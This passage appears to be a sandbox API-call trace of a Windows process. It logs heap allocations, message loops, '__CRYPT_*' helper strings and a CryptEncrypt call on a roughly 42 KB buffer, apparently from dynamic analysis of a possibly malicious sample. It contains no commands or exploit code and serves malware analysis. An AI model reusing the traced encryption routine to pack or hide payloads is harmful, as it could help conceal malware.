PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0259.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0259.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0259.819] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0259.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0259.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51988 [0259.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0259.820] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 1 [0259.820] TranslateMessage (lpMsg=0x8ced58) returned 0 [0259.820] DispatchMessageW (lpMsg=0x8ced58) returned 0x0 [0259.820] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0259.820] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0259.820] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0259.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0259.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0259.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0259.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0259.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0259.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0259.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0259.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0259.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0259.820] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0259.820] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0259.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0259.821] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0259.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0259.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51988 [0259.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0259.821] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0259.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0259.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0259.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.821] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0259.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0259.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0259.821] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0259.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0259.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0259.821] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0259.821] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0259.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0259.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0259.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0259.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0259.822] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0259.822] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0259.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0259.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0259.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0259.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0259.822] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0259.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51988 [0259.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0259.822] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0259.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0259.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0259.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0259.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0259.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0259.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0259.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0259.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0259.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0259.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0259.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0259.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0259.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0259.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0259.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0259.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0259.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0259.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0259.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0259.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0259.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0259.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0259.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0259.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0259.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0259.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0259.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0259.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0259.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0259.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0259.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0259.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0259.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0259.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0259.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0259.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0259.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0259.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0259.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0259.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0259.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0259.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0259.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0259.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0259.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0259.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0259.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0259.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0259.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa512) returned 0x2f32f70 [0259.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f32f70 | out: hHeap=0x970000) returned 1 [0259.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0259.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0259.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0259.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0259.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0259.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e565e8 [0259.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0259.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0259.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0259.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0259.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0259.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0259.828] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0259.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0259.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0259.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0259.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0259.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0259.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0259.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0259.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0259.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0259.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0259.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0259.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0259.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0259.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0259.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0259.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0259.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0259.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0259.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0259.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0259.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0259.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0259.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0259.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0259.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0259.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0259.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0259.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0259.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0259.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0259.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0259.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0259.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51c58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0259.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0259.832] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0259.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0259.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0259.832] CryptEncrypt (in: hKey=0xa87490, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xa512, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xa518) returned 1 [0259.832] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.832] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0259.832] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.832] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.833] CharLowerBuffW (in: lpsz="byte[42264]", cchLength=0xb | out: lpsz="byte[42264]") returned 0xb [0259.834] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.838] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.838] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0259.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519a0 [0259.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0259.839] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0259.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0259.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0259.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0259.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0259.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0259.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0259.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0259.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0259.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0259.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0259.839] RtlAllocateHeap 